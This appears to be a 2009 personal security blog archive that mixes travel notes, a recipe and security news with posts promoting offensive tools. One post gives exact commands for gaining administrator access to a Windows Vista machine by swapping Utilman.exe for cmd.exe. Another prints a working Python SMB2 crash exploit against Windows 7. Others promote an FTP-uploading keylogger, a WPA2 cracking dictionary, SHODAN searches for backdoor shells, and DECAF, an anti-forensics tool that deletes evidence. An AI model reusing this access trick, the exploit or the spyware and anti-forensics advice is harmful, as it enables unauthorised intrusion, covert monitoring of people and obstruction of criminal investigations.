Wednesday, December 30, 2009

DECAF is Back


Hey Folks today I wanna report the DECAF history:




We originally pulled the app because of legal pressure. With DECAF v1 originally set out to restrict forensic extractions made by Microsoft COFEE, it raised major concerns with its ethical nature and potential hazard to the disruption of criminal investigations. By us disabling the application, it freed us from any damage that might have happened in the event DECAF v1 was used to block forensic examiners from extracting data. We used the words "publicity stunt" because when we pulled DECAF v1 offline and disabled the applications, we had a lot of media attention. We decided to use that channel to raise awareness for better security and more privacy tools.

After the interview with Cyberspeak, we had a nice long phone conversation. During that time, they informed me of my hazardous circumstances and gave me excellent advice; take DECAF down. Of course, if you know anything about them over at Cyberspeak, you would know they are very intelligent on more then just forensics. They are pretty well versed with federal statues. It would be silly of me to think that I knew more then them, so I followed their advice and pulled the app.

As you know, this caused major conflict in the underground scene. We started getting denial of serviced, flamed on forums, and even SoldierX did a pretty good job re-activating DECAF v1. We are definitely not mad at SoldierX for that, can you blame them? Everyone wants privacy. Not to mention DECAF v2 was already cookin' in the kitchen so it was only a bit of time before it would be released.

Now I want to address the phone home feature in DECAF v1. As you know, we were going to tailor the app towards the p2p private tracking scene. We were going to use the phone home feature to notify private tracker admins of a seeder/node who had COFEE ran on his/her machine. This feature was not complete before release but we did have it semi-working, hence the COFEE usage reporting. Some seen this as a privacy issue, which from that perspective I can see why. We decided v2 will not report usage back. We also do not perform automated version checking.

The disabling of v1 was NOT a hook in the application. It was bad coding. I did not use a try/catch on the version checking so if it failed, the app failed. Of course the app was only coded in a 1-2 day timeframe, so can you blame me? Bad practice I guess. Anyhow, when I adjusted the versioncheck on the server side, it caused the application to return a null string, causing an unhandled exception.

Version 2 is finished. We are now monitoring Microsoft COFEE, Helix, EnCase, Passware, Elcomsoft, FTK Imager Port, Forensic Toolkit, ISOBuster, and ophcrack. We also give the user the ability to add their own custom signatures. We have also added CD-Rom monitoring. We no longer execute a "self destructive lock-down mode" but rather give the user the ability to execute files, to disable the device where the signatures were found, and start-up in monitor mode.



Thank you DECAF's team for you amazing job, I really appreciated you effort. Now, may I ask you a question, What about the source code ? is it available ?


Here the direct link (no adv) to DECAF

Monday, December 28, 2009

Tweeter's Black Password List

Hey folks, just gotta from friends.
The reason I present this is because it's an interesting study of what Twitter thinks is a bad idea. I would guess that many of these passwords were taken from published lists of passwords used when cracking accounts. If you currently use passwords which resemble any of these listed below, I'd encourage you to change them as soon as possible.

111111
11111111
112233
121212
123123
123456
1234567
12345678
131313
232323
654321
666666
696969
777777
7777777
8675309
987654
aaaaaa
abc123
abc123
abcdef
abgrtyu
access
access14
action
albert
alexis
amanda
amateur
andrea
andrew
angela
angels
animal
anthony
apollo
apples
arsenal
arthur
asdfgh
asdfgh
ashley
august
austin
badboy
bailey
banana
barney
baseball
batman
beaver
beavis
bigdaddy
bigdog
birdie
bitches
biteme
blazer
blonde
blondes
bond007
bonnie
booboo
booger
boomer
boston
brandon
brandy
braves
brazil
bronco
broncos
bulldog
buster
butter
butthead
calvin
camaro
cameron
canada
captain
carlos
carter
casper
charles
charlie
cheese
chelsea
chester
chicago
chicken
cocacola
coffee
college
compaq
computer
cookie
cooper
corvette
cowboy
cowboys
crystal
dakota
dallas
daniel
danielle
debbie
dennis
diablo
diamond
doctor
doggie
dolphin
dolphins
donald
dragon
dreams
driver
eagle1
eagles
edward
einstein
erotic
extreme
falcon
fender
ferrari
firebird
fishing
florida
flower
flyers
football
forever
freddy
freedom
gandalf
gateway
gators
gemini
george
giants
ginger
golden
golfer
gordon
gregory
guitar
gunner
hammer
hannah
hardcore
harley
heather
helpme
hockey
hooters
horney
hotdog
hunter
hunting
iceman
iloveyou
internet
iwantu
jackie
jackson
jaguar
jasmine
jasper
jennifer
jeremy
jessica
johnny
johnson
jordan
joseph
joshua
junior
justin
killer
knight
ladies
lakers
lauren
leather
legend
letmein
little
london
lovers
maddog
madison
maggie
magnum
marine
marlboro
martin
marvin
master
matrix
matthew
maverick
maxwell
melissa
member
mercedes
merlin
michael
michelle
mickey
midnight
miller
mistress
monica
monkey
monkey
monster
morgan
mother
mountain
muffin
murphy
mustang
naked
nascar
nathan
naughty
ncc1701
newyork
nicholas
nicole
nipple
nipples
oliver
orange
packers
panther
panties
parker
password
password
password1
password12
password123
patrick
peaches
peanut
pepper
phantom
phoenix
player
please
pookie
porsche
prince
princess
private
purple
pussies
qazwsx
qwerty
qwertyui
rabbit
rachel
racing
raiders
rainbow
ranger
rangers
rebecca
redskins
redsox
redwings
richard
robert
rocket
rosebud
runner
rush2112
russia
samantha
sammy
samson
sandra
saturn
scooby
scooter
scorpio
scorpion
secret
sexsex
shadow
shannon
shaved
sierra
silver
skippy
slayer
smokey
snoopy
soccer
sophie
spanky
sparky
spider
squirt
srinivas
startrek
starwars
steelers
steven
sticky
stupid
success
summer
sunshine
superman
surfer
swimming
sydney
taylor
tennis
teresa
tester
testing
theman
thomas
thunder
thx1138
tiffany
tigers
tigger
tomcat
topgun
toyota
travis
trouble
trustno1
tucker
turtle
twitter
united
vagina
victor
victoria
viking
voodoo
voyager
walter
warrior
welcome
whatever
william
willie
wilson
winner
winston
winter
wizard
xavier
xxxxxx
xxxxxxxx
yamaha
yankee
yankees
yellow
zxcvbn
zxcvbnm
zzzzzz

Old Fashion Microsoft IIS Vulnerability


An old fashion vulnerability, as been discovered in Microsoft Internet Information Service (IIS) where the server interprets incorrectly files with multiple extensions separated by character ";".




The file "aspShell.as;.jpg" is interpreted by web applications as a normal JPEG file while IIS considers it as an ASP file to be interpreted.

This allows attackers to upload malicious executable's on the vulnerable web server, bypassing the normal file extension protections. In case of having the "aspShell.as;.jpg", web applications consider it as a JPEG file and IIS
consider it as an ASP file and pass it to “asp.dll”. This bug does not work with ASP.Net as the .Net technology cannot recognize "aspShell.as;.jpg" as a .Net file and shows a “page not found” error. Besides using semi‐colon, “:” can be used to make an empty file with any arbitrary extension. For example by uploading “test.asp:.jpg”, an empty ASP file ‐ “test.asp” ‐ would be created on the server on an NTFS partition. This is only because of “NTFS Alternate Data Streams” and it is completely different from the semi‐colon vulnerability.

The bug was discovered on April 2008 but reported only 25 December 2009.

This vulnerability has a very high impact on IIS as the attacker can bypass file extension protections by using a semi-colon after an executable extension such as “.asp”, “.cer”, “.asa”, and others.


To read more about the vulnerability, and for some examples here.

Sunday, December 27, 2009

Back From Napa


After 3 full days in Napa I'm back to Davis.
I had an awesome Christmas with my friends Ryan and Katie at "The Craftsman Inn ".



Napa's Valley seems to be the US's tuscany, wineries, hills full of grapes, good wine and, of course, wine testing tours. Everybody become friends, singing and laughing together, after a good wine round ... ... according to the old "well-known" latin sentence:





:D

Wednesday, December 23, 2009

Microsoft, Avast and McAfee Missing Simple Tests

Using the simple "Quick'n Dirty" EICAR-GTUBE-Generator0.1 ( here last version ) I hided the EICAR signature inside a simple PDF file. Now let's give this pdf to AV and see what will happen.

Here the "fun" results (click to make it bigger):




Is it not weird that some AV leaders such as Microsoft, Avast and McAfee miss this easy control ?
Now, my question comes easily ... How can we be sure that recognize more complicated virus if they miss this easy signature control ?

More reading: Here, Here and Here

New Version of EICAR-GTUBE-Generator

Hi Folks, a quick post before Xmas's eve. I've just released a new "Quick'n Dirty" release of EICAR-GTUBE-Generator.

New features:

Version 0.1 injects EICAR inside PDF files




Here the source code and the executables

1) EICAR-GTUBE-Generator-Jar0.1
2) EICAR-GTUBE-Generator-Sources0.1

Tuesday, December 22, 2009

EICAR and GTUBE Generator - Anti VIrus Results -


Analyzing the EICAR-GTUBE_Generator using a common multi-anti-virus platform like VirusTotal seems no AVs recognaize the EICAR-GTUBE-Generator as a EICAR generator (so in some way a malware generator): here the proof (click to enlarge)



Now, my question is: Do the AVs truly analyze the EICAR signature or do they apply a simple pattern matching ?
On the other hand, analyzing the resulted file EICAR.com there is more fun:



First of all Prevx.com does not recognize the EICAR file. That's very interesting,to me. They claim to be:

"PC and Internet Security powered by the World's largest real time threat database..."

But they don't recognize one of the most famous string in AV's society. So guys, are you sure to have the world's largest DB ? Maybe you need a little of "back to easy stuff" policy ?
Anyway, the second interesting thing is on Microsoft AV which recognize EICAR but as a VIrus ( in fact at the beginning there is the label Virus:). That is technically wrong. All the other Tested AVs did a good job labeling EICAR as warning and testing file. Why does Microsoft recognize EICAR as virus and not as a standard testing file ? Maybe is this just the pic of a wrong pattern recognition's iceberg, present in Microsoft AV ? I'll check out soon !

Sunday, December 20, 2009

EICAR and GTUBE Generator

Hi Folks,
today I wanna share a little but interesting (at least to me) mini software for testing ANTI-VIRUS and ANTI-SPAM engines.I called it EICAR-GTUBE-Creator and it's a little utility to create run time EICAR Test Antivirus file and GTUBE anti spam test mail.

The EICAR test file (official name: EICAR Standard Anti-Virus Test File) is a file, developed by the European Institute for Computer Antivirus Research, to test the response of computer antivirus (AV) programs. The rationale behind it is to allow people, companies, and AV programmers to test their software without having to use a real computer virus that could cause actual damage should the AV not respond correctly. EICAR likens the use of a live virus to test AV software to setting a fire in a trashcan to test a fire alarm, and promotes the EICAR test file as a safe alternative.


The GTUBE (Generic Test for Unsolicited Bulk Email) is a 68-byte test string used to test anti-spam solutions, notably those based on SpamAssassin. In SpamAssassin, it carries an antispam score of 1000 by default, which would be sufficient to trigger any installation.


The EICAR Anti-Virus test file is great to test your Anti-Virus software, but it’s not easy to handle, because your Anti-Virus software keeps deleting it. For this reason I came out with this utility. Here the main window, by clicking on EICAR button the utility will generate the the EICAR file in the current directory. Your AV should detect it immediately ! This utility can be used also to measure AV performance in detecting this file.

Here the GTUBE window. Basically you have to send one email to the testing email box. The utility will automatically add the GTUBE "Infection".



Finally the Source code and the executable (JAR, platform independent).

Java (platform independent) executable (jar)
Java Source Code (built to Netbeans 6.5.1)


Enjoy your testing

Cool and Free Software KeyLogger

Hi Folks, today I wanna share a very cool software keylogger.
It's written in C++, it uploads logged actions (like keyboard, mouse, keyboard combos, and etc.) through FTP on your personal FTP server. Here the link .

What you need to edit to fit it in your system are the following lines (click on images to make they bigger):



And if you wish to modify the file name you have to change these other lines (click on images to make they bigger):




I've used it a couple of time and it works fine under windows systems. If you wanna a more professional keylogger you may modify this code just a little to obtaining great results.

Wednesday, December 16, 2009

Free Huge Password Dictionary


Today I wanna share a huge work done during last years, just because traveling a lot it has been very useful, you know WPA2 was the main target, but you can really use it in a lot of different ways. It seems that is very difficult to find a good and free password dictionary around internet, for some of them you have to pay, for some others you need to wait long time on torrents on P2P.. So finally I decided to share my personal one :D, on RapidShare. There still is a lot to do with this huge password dictionary (I'm thinking on optimization and upgrading ), so if someone of you interested in that want to upgrade or to optimize the dictionary I'll be very glad. If you are planning to modify it, please let me know in such way I'll upgrade the RapidShare files, having an always upgraded Free Password Dictionary Repository.

Here the link to download the Free Password Dictionary:



Ok, after you downloaded all the zip files in a folder (let's say DictionaryFolder) you can unify the files, making the HugePasswordDictionary file, simply using the cat command.

cat x* >> MyHugePasswordDictionary.txt

If you wanna use the "MyHugePasswordDictionary.txt" with aircrack-ng, you need to slipt it into little 2MB files. To do that you can simply use the split Unix command like the follow example.

split -b 2m MyHugePasswordDictionary.txt

At the end of the process you'll find several 2MB files inside your "DictionaryFolder" directory.

Enjoy !

Monday, December 14, 2009

Detect and Eliminate Computer Assisted Forensics (DECAF)

Hey Folks,
today I wanna point out this interesting tool, called DECAF. It's an anti Microsoft Computer Online Forensic Evidence Extractor (COFEE).

As many of you probably remember ....

Computer Online Forensic Evidence Extractor (COFEE), designed exclusively for use by law enforcement agencies. COFEE brings together a number of common digital forensics capabilities into a fast, easy-to-use, automated tool for first responders. And COFEE is being provided—at no charge—to law enforcement around the world.
With COFEE, law enforcement agencies without on-the-scene computer forensics capabilities can now more easily, reliably, and cost-effectively collect volatile live evidence. An officer with even minimal computer experience can be tutored—in less than 10 minutes—to use a pre-configured COFEE device. This enables the officer to take advantage of the same common digital forensics tools used by experts to gather important volatile evidence, while doing little more than simply inserting a USB device into the computer.


The new software against COFEE seems to be really useful for everybody who needs max privacy and for whom don't like be investigated. The web site claims:



DECAF is a counter intelligence tool specifically created around the obstruction of the well known Microsoft product COFEE used by law enforcement around the world.
DECAF provides real-time monitoring for COFEE signatures on USB devices and running applications. Upon finding the presence of COFEE, DECAF performs numerous user-defined processes; including COFEE log clearing, ejecting USB devices, drive-by dropper, and an extensive list of Lockdown Mode settings. The Lockdown mode gives the user an automated approach to locking down the machine at the first sign of unusual law enforcement activity.
DECAF is highly configurable giving the user complete control to on-the-fly scenarios. In a moments notice, almost every piece of hardware can be disabled and pre-defined files can be deleted in the background. DECAF also gives the user an opportunity to simulate COFEE's presence by sending the application into a 'Spill the cofee' type mode. Simulation gives the user an opportunity to test his or her configuration before going live.
Future versions will have text message and email triggers so in case the computer needs to enter into lockdown mode the user can do it remotely. It will also have notification services where in the case of an emergency, someone can be notified (private torrent tracker admins). DECAF's next release is going to be available in a more light-weight version and/or a windows service.


Once run the software it appears the following window, very intuitive and very smooth.


This is the main screen about the "Lock Down" option.



Well, people who don't want "be investigate" need to install this "tiny" and "dirty" DECAF-software, BUT they must be aware that exist plenty other ways to investigate into their Windows machine.

Saturday, December 12, 2009

Google PhoneBook.

Google Phonebook has been around from years but few people know about it.

Google Phonebook is the Google product that traces your phone numbers and your addresses. To be able to search it, you have to know the URL, you can't directly link to it, and to enter the interface you must be linked to an already completed search, such as: http://www.google.com/search?hl=en&pb=r&q=Bill+Gates&btnG=Search+PhoneBook.




Typing names you get phone's numbers and addresses (attached directly to google maps). Obviously you may claim your privacy and ask to be removed from the list ( this is the direct link ), BUT did you know to be inside google phonebook ?
Maybe I'm wrong (and I'm sure I am, because they're doing it... so probably they can), but in my mind the process should be the opposite: "if you want to be linked in the phonebook you should ask to be added" (or someone should ask to you if you want to be added to the phonebook). I believe many people don't know to be linked in GPhoneBook and they don't know to share their personal information such as phone number and addresses, to all over the world.


Dan Philpott comment was:

This feature has been around and well known for ... when did Google start? Pretty much ever major search engine that ever existed has had a white pages lookup function. Published phone numbers are one of the most accessible and ubiquitous data sets available in the early days of the Internet. Search engines plugged them into the data collected and found ways to add value with things like reverse lookups.

Not sure what the privacy implications are. This information is public and published in phone books and on a wide variety of phone number sites.



Do you have any other thought ?

Finally Arrived !

Hi folks,
I'm finally in Davis, CA. The trip was very long, about 3300 Miles, 65 driving hours, a huge snow storm in Arizona (Flagstaff) lots of deserts and forests. But everything was amazing.




I enjoined a lot the long trip, the fascinating Route66 and the wonderful Painted Desert (Arizona).




From Monday I'll start my job in UCDavis.
If somebody is planning to come near bayarea please let me know, we may organize something.

Saturday, December 5, 2009

Clickjacking: Starting Point.

Hello folks,
according to wikipedia, clickjacking is a malicious technique of tricking Web users into revealing confidential information or taking control of their computer while clicking on seemingly innocuous Web pages. A vulnerability across a variety of browsers and platforms, a clickjacking takes the form of embedded code or script that can execute without the user's knowledge, such as clicking on a button that appears to perform another function.
The term "clickjacking" was coined by Jeremiah Grossman and Robert Hansen in 2008. The exploit is also known as UI redressing.




if you're interested in new advanced clickjacking techniques, I wanna point out this nice paper ( :D ) titled: Frightened by Links, where you can find a couple of examples including codes and images. To me, it's a good starting point. Let me know what do you think about that.

Friday, December 4, 2009

Just For Fun, not Yet Security

Hi Folks, I'm still roadtripping US.
Actually I am in Oklahoma City and I'm writing from an Internet Caffe in downtown passing through a secure SSL Proxy.
I don't have enough time to write about security stuff BUT, 2 days ago I received a nice email from a friend of mine containing these funny pictures. I wanna share it to you.







I'm not sure they well represent the difference between Mic and Mac guys, anyway they're funny.

Monday, November 30, 2009

Moving Time.

Hi Folks,
today it's my last day in DC ! I very enjoined DC, the city is wonderful and the working opportunities are huge. Even the weather it's not so bad ! Tomorrow morning I'll leave at 5AM (trying to avoid DC traffic), destination Davis, CA. I'll try with the old and classic road, the Route 66. I hope my 2002 Ford Explorer will "strong enough" to cross the rocky mountains!

So basically I'll read mails every evening from 7PM to 9PM, Probably I'll not present on IM for 2 weeks and probably it will be difficult to me uploading my blog till December 15th.




Today my blog reached 280 visits per day all around the world, that's a lot for me ! So stay tuned even if you will not read much news from my blog during these two weeks.


California's Click Per Day. November 30th, 9:40 AM

To all the Californian readers, I'll back and I'll glad to meet you in somewhere in norten California, if you like that, please let a comment below, I'll contact you soon !

Saturday, November 28, 2009

YouTube Video Spam

Hi Folks,
this morning I saw these fraudulent youtube videos.


I never thought on this kind of "spam" technique. While the user is watching his favorite music video an advertisement's pop-up comes in the monitor saying: "to see more about your favorite singer click here". The user, especially during the first attacks, is tempted to click on - or copy and paste the fraudulent link which might point to whatever malicious site.

Here another example ..



If you wanna try by yourself, the youtube search words are:
Adam Lambert AMA kiss
Ortiz vs. Griffin

Friday, November 27, 2009

RunAlyzer.

Hi Folks,
as you know I'm not a Windows User, but when I find something interesting on "Windows Side" (I usually say "windows side" for W. users and "Mac side" for M. users)I wont stop me writing something about it. During these days I've been involved in a Forensic committee on some Windows machines. It was the first time that a guy showed me this amazing windows forensic tool called RunAlyzer. Its "international" web site shows that the project is pretty known in different countries (since there are a lot of different languages and testimonials) and it seems very well supported, in terms of documentation, wiki and forums.



The software is very intuitive even if explores very technical details about Windows OS. I personally found this software very useful since you can analyze and manage real time processes, explore Windows Reg's KEY, services, logs and much more. (take a close look to the follow image by clicking over it)


Thursday, November 26, 2009

Happy Thanksgiving to you



Personally I love fried turkey ! ( Thanks FoodGeeks )

INGREDIENTS

4 to 5 gallons vegetable oil
1 (12-15 lb.) whole turkey, room temperature
Cayenne pepper (optional)

INSTRUCTIONS

1. Begin heating the oil in a 10-gallon pot over a very hot propane flame outdoors. Don't set the burner to its highest setting, as you may need to increase the heat after you've added the turkey. It will take about 20 minutes for the oil to heat.

2. Meanwhile, rinse the turkey well, pat it dry inside and out, and set it on end in a sink to drain.

3. When the oil reaches 375°F, pat the turkey dry again and sprinkle it with cayenne, if desired. If your cooker has a basket insert, place the turkey in the basket and set it over a baking sheet. If not, set an oven rack over a large baking sheet, place the turkey on it and take them outside to the cooker.

4. Check the temperature of the oil. When the oil reaches 390°F, carefully and slowly lower the basket with the turkey into the oil or lower it holding it by its legs or by a long heavy tool such as a clean fireplace poker inserted into its cavity. Be careful! Immediately check the oil temperature and adjust the flame so that the temperature does not dip below 340°F. You want to maintain the temperature at 365°F. As it cooks, occasionally move the bird around in the oil so that it does not scorch (the oil near the heat source will be hotter). Whole turkeys take only 3 to 4 minutes per pound to fry to perfection. Small ones, around 12 pounds, will take about 35 minutes. Large ones, around 15 pounds, will take about 1 hour. When it is done, the turkey will float to the surface with a perfectly crispy; brown skin. If you are unsure, you can test the meat for doneness at the hip joint or insert a meat thermometer into the breast; it should register 180°F.

5. Using the basket insert if there is one or by again inserting a long heavy tool such as a clean fireplace poker into its cavity; carefully remove the turkey from the oil and hold it over the pot for a moment to allow any excess oil to drain back into the pot, then lay the bird on the oven rack. Allow it to rest for 20 minutes before carving.

Tuesday, November 24, 2009

SHODAN, The Best Computer Search Engine, Ever

Hi Folks,
this morning I discovered this amazing Computer Search Engine: SHODAN



SHODAN lets you find servers/ routers/ etc. by using the simple search bar up above. Most of the data in the index covers web servers at the moment, but there is some data on FTP, Telnet and SSH services as well. Let me know which services interest you the most and I'll prioritize them in my scanning.

Lets say you want to find servers running the 'Apache' web daemon. A simple attempt would be to use:

apache

How about finding only apache servers running version 2.2.3?

apache 2.2.3

You can also narrow down the results using the following search parameters:

country:2-letter country code
hostname:full or partial host name
net:IP range using CIDR notation (ex: 18.7.7.0/24 )
port:21, 22, 23 or 80


For example: get all web (port:80) hosts running 'apache' in switzerland (country:CH) that also have '.ch' in any of their domain names:

apache country:CH port:80 hostname:.ch

Just for the shake of hackers lets try some examples:

1) List of backdoor shell (try-it)
2) Bad Telnet Services (try-it)
3) List of old IIS 4.0, very bad... (try-it)

Now, I strongly believe in next few days a lot of systems will be compromised. With this service attackers will find vulnerable random services/servers, that is the manna for script kiddies.
One question comes out .... It will change the attack paradigm ? At the beginning of the attack's history, attackers hit the target only for particular reasons such as: politics, personal, money and so forth. Now attackers may want to attack some targets only because it's vulnerable to something, without any true reasons, only for the shake to attack something. This will be a huge paradigm shift.

Sunday, November 22, 2009

Definitely Polymorphic Malware.

Hi folks, let me say two more words about the previous code.
I strongly believe that the discussed code at the beginning of his life, followed the fastcall convention (1). As you can see, the first parameters are put directly into CPU registers, and after that saved into the stack (2),this is the classic fastcall behavior.



Due to polymorphism, the code is able to change itself. One of the first basic techniques is to change registers and saved locations like shown in (2). Basically we are in front of a polymorphic and evolved (by meaning: "not the original") malware .

Friday, November 20, 2009

The First Time Against Calling Conventions

This morning I've been fascinated by a non standard "Calling Convention" Function. Usually I play with cdecl (C calling convention), stdcall (the Microsoft standard calling convention) or from time to time I've also exploited some fastcall (fast calling convention) but I've never seen something like that:


arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
lea eax, [ebp+arg_4]
push eax ; va_list
push ecx ; char *
push esi ; size_t
push edi ; char *
call __vsnprintf
add esp, 10h
mov byte ptr [edi+esi-1], 0
pop ebp
retn

Variable in eax, ecx, esi and edi ? What's kind of convention is this?

Thursday, November 19, 2009

Top 5 Social Engineering Techniques

Hello folks,
today I just wanna share this nice article from PCWorld about the top 5 socials engineering techniques. Take a look and see if your company is vulnerable too.



Social Engineering: "There's no patch to human ingenuity ... ".

Wednesday, November 18, 2009

CAINE 1.5 released

Hi folks,
this is one of my favorite Forensic Distributions; it's called CAINE. Today is has been updated to version 1.5.



Main features:
WinTaylor 1.5, forensic frontend for Windows environment
CHANGELOG CAINE 1.5
Kernel 2.6-24.25 updated.
ADDED:
lnk_parse
lnk.sh
mork
steghide
UserAssist
dos2unix
chntpw
tkdiff
xdeview
md5deep,foremost updated
launchers fixed
manual updated
README.txt in the bash scripts directory
Photorec and Testdisk and XSteg in the Forensics menu
Window list and Show Desktop added.
------------------------------------------------
Widows Side:
Wintaylor updated
HexEdit added
Regmon updated
FTKImager updated
Index.html fixed
Photorec
Testdisk
Nigilant32
UsbWriteProtect

CAINE is one of the most intuitive Live-Distro for Forensic Analysis, I suggest it to everybody who's new to the topic. It's easy learning Forensic Analysis through this tool.

Wikipedia Toolbar CSC Vulnerability



That's interesting. I don't mean the vulnerability per se but the Wikipedia toolbar which is widely used. Here the full description.

Monday, November 16, 2009

Somewhere in Delaware



The new security paradigm or the new apple's patent prototype (camera behind monitor ) ?

Saturday, November 14, 2009

Gain Vista Administrator's Privilege

Hi Folks, today I wanna point out one of the plenty ways to gain access into Vista Boxes. Thank to some mailing list friends.
This way is clearly faster then brute forcing and boot-replacing passwords.


Boot into Backtrack and open a shell prompt:
cd /mnt (change directory to mounted drives)
ls (get the list of mounted drives)
cd sda1 (sda1 is the main hard drive)
cd Windows/ (change to the windows directory)
cd System32/ (change to the system directory)
mv Utilman.exe Utilman.old (backup original file)
cp cmd.exe Utilman.exe (copy cmd.exe as utilman.exe)
reboot.
Once rebooted, at vista logon screen, Press Windows key + U
To invoke Utility Manager ( A.K.A. CMD.exe)
Cmd.exe will spawn with ‘System’ privileges.
c:\>net user S00perAdmin mypassword /add
c:\>net localgroup administrators S00perAdmin /add
Reboot and log in with your newly added Admin account

The Science News Cycle

It's so true !



Via PHD Comics

Thursday, November 12, 2009

TLS and Authentication Issues.

Yesterday, during the "Veterans Day", I spent my morning to understand the TLS attack described here



I suggest these readings to all f you, I know, it's not very "new", but it's still incredible understanding there are protocol issues yet, even if the protocol is old and well tested.

Wednesday, November 11, 2009

Windows 7: The most Secure OS ...

Directly from Microsoft TechNET

Built upon the security foundation of Windows Vista, Windows 7 introduces a number of security enhancements to give users the confidence that Microsoft is continuing to find better ways to safeguard users’ IT investments as well as data. Businesses will benefit from enhancements that help protect company sensitive information, that provide stronger protections against malware, and that help secure access to corporate resources and data. End users can enjoy the benefits of computers and the Internet knowing that Windows 7 is using new technologies and features to safeguard privacy and personal information. Finally, all users will benefit from the flexible security configuration options in Windows 7—options that will help users achieve the unique balance of security and usability to meet their specific needs.





Today Laurent Gaffie' described a very easy trick to crash the system. The bug trigger an infinite loop on smb{1,2}, pre-auth, no credential needed. Basically:
netbios_header = struct.pack(">i", len(''.join(SMB_packet))+SMB_packet
(The netbios header provide the length of the incoming smb{1,2} packet)
If netbios_header is 4 bytes smaller or more than SMB_packet, it just blow !
Here the small script against the giant Microsoft Windows 7 :
import SocketServer

packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"


class SMB2(SocketServer.BaseRequestHandler):

def handle(self):

print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()

If you are interested on more details please visit Laurent Blog

Tuesday, November 10, 2009

Microsoft MiniFuzzer

Microsoft SDL team releases two security verification tools as FREE DOWNLOADS
BinScope Binary Analyzer integrates directly into the Visual Studio 2008 IDE. MiniFuzz File Fuzzer is a Visual Studio 2008 add-in. Both tools provide easy integration with TFS 2008 and the SDL Process Template for VSTS 2008! Both of them are available here.
MiniFuzzer File Fuzzer.
MiniFuzz is a basic testing tool designed to help detect code flaws that may expose security vulnerabilities in file-handling code. This tool creates multiple random variations of file content and feeds it to the application to exercise the code in an attempt to expose unexpected application behaviors.

Because fuzzing is effective at finding bugs, it is a required activity in the Verification Phase of the Microsoft Security Development Lifecycle (SDL). With the release of MiniFuzz, we have made a simple file fuzzer available to assist developer efforts to find and address more bugs in code before it ships to customers.
BinScope Binary Analyzer.
The BinScope Binary Analyzer is a Microsoft verification tool that analyzes binaries to ensure that they have been built in compliance with Microsoft’s Security Development Lifecycle (SDL) requirements and recommendations. BinScope checks that SDL-required compiler/linker flags are being set, strong-named assemblies are in use, and up-to-date build tools are in place.

BinScope also reports on dangerous constructs that are prohibited or discouraged by the SDL (e.g. read/write shared sections and global function pointers). For a more detailed enumeration of the checks performed by BinScope, please see the BinScope documentation. BinScope is available in two forms: as a standalone executable and as a Visual Studio add-on.

UPGRADE: Here a First impression. Take a look.

Monday, November 9, 2009

Why Prof. Chaum's Machines Don't Work in California

Maryland tested the new Verifiable Voting System designed by David Chaum and his team. I haven't see logs and comments about that so far, but I believe everything gone fine. Immediately after the news my guess was, why we don't try the system in a biggest contest like, for example California ? With respect to the current test, I believe that a wider range of people may prove a higher reliability, and much more test cases ( I know that it is a pretty new system but I also know that it has been studied for a while) to stress the system.



Since I'm living in US for (2)years, I still don't remember that each state has own laws. Thank to my friend and colleague Sean I finally understood why Scantegrity cannot be used in California.

These are the two main laws issues :
13204. (a) "All distinguishing marks or erasures are forbidden and
make the ballot void."

and

14287. "No voter shall place any mark upon a ballot that will make
that ballot identifiable."

Here the official voting codes: Voting Machine dir. (Section 13280-13289), Election Code dir. (13200-13220) and some exceptions (Section 13230-13233).

For people that don't know how scantegrity works here a nice graphical summary.



As you see in the figure above, people have to mark the ballot ("Waht Voter Leaves in the Ballot Box") and people could keep a voting proof (A: "What Voter Takes Home").

Sunday, November 8, 2009

Thnk you xkcd !

I often enjoy the xkcd comics, but this is super !



via xkcd

Friday, November 6, 2009

Maryland Tested New Electronic Voting System

From Wired.




On Tuesday voters in Takoma Park, Maryland, got to try out a new, transparent voting system that lets voters go online to verify that their ballots got counted in the final tally. The system also lets anyone independently audit election results to verify the votes went to the correct candidates.

The open source, optical-scan system, called Scantegrity, was developed by cryptographer David Chaum, with researchers from MIT, the University of Maryland - Baltimore County, George Washington University, the University of Ottawa and the University of Waterloo. It’s similar to another system, called Punchscan, that won the researchers $10,000 in 2007 at a voting machine competition sponsored by the National Science Foundation.


I'm looking forward to see the new logs !

Tuesday, November 3, 2009

iPhone Hostage. 5 Bucks for Releasing.

What happens if you forget to change your iPhone ssh password and you're using GPRS or 3G ? Of course you'll be hacked.



It appears one enterprising Dutch hacker used port scanning to identify jailbroken iPhones on T-mobile Netherlands with SSH running. Enabling SSH is a common procedure for jailbroken iPhones, allowing a user to log in via Terminal and run standard UNIX commands. Unfortunately, iPhones all have a default root password that many forget to change after jailbreaking, leaving their phone as vulnerable as a Lamborghini parked on a public street with the windows down, the doors unlocked, and the keys in the ignition.


Read more here.

ICANN Approves Non Latin Character Domains

This is absolutely true, ICANN said "Yes" to UNICODE DNS domains.



It's hard to judge, on one hand we got a more international " world wide web" :


Let's face it; millions of Internet users speak languages that aren't written using Roman characters. Allowing Web sites to have domains that use other characters will make Web addresses more recognizable to some and make the Web more accessible to millions of new users.
The transition will begin on November 16 when countries can apply for country codes in their own unique character sets.
"The first countries that participate will not only be providing valuable information of the operation of IDNs in the domain name system, they are also going to help to bring the first of billions more people online -- people who never use Roman characters in their daily lives," ICANN CEO and President Rod Beckstrom said in a statement.


But on the other hand we have some obvious security problems:



